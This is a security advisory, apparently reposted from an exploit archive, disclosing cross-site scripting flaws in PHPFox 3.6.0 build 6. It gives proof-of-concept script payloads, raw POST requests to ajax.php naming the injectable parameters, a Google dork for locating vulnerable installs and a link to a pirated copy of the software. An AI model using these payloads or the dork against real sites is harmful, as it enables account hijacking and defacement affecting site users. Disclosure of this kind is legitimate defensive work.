PHPFox 3.6.0 Cross Site Scripting

2013.10.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------ Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities ------------------------------------------------------------ Author: #BHG Security Center Date: Saturday, October 12, 2013 Vendor: http://www.phpfox.com Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip Vulnerable Version(s): v3.6.0.Build.6 is vulnerable. Tested Version: 3.6.0.Build.6 Vulnerability Type: Cross-Site Scripting Google Dork: "Powered By PHPFox Version 3.6.0"? Risk Level: High Saftware Price : 299 $ Tested on: Windows, PHP 5.2 Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature -- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com ------------------------------------------------------------ == Proof of concept == ------------------------------------------------------------ [-] Description : [-] PoC 1.1: Xss Code Injection Join Field : 1) Xss Code : <script>alert(12)</script> 2- Encode to : &lt;script&gt;alert(12)&lt;/script&gt; 3- Put in First name Sign Up 4- After Login get your mouse on Recent Logins 5- and you will see Xss Code was successful ------------------------------------------------------------ Vulnerable File(s): [+] ajax.php Vulnerable Parameter(s): [+] sId [+] sInput [+] title [+] type [-] PoC 2.2: ## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script> ## Request POST /upload/static/ajax.php HTTP/1.1 =undefined&core[ajax]=true&core[call]=captcha.reload&core [is_admincp]=0&core[is_user_profile]=0&core[profile_user_id] =0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code] [-] PoC 3.3: ## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad=" ## Request POST /upload/static/ajax.php HTTP/1.1 core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74 &feed_id=1&height=300&is_feed_view=1&sharemodule=event &title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550 ------------------------------------------------------------ Timeline: ------------------------------------------------------------ Advisory Publication: September 18, 2013 [without technical details] Vendor Notification: September 18, 2013 Public Disclosure: October 12, 2013 #BHG Security Center # Gr33tz: # Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d # HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini

References:

ttp://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top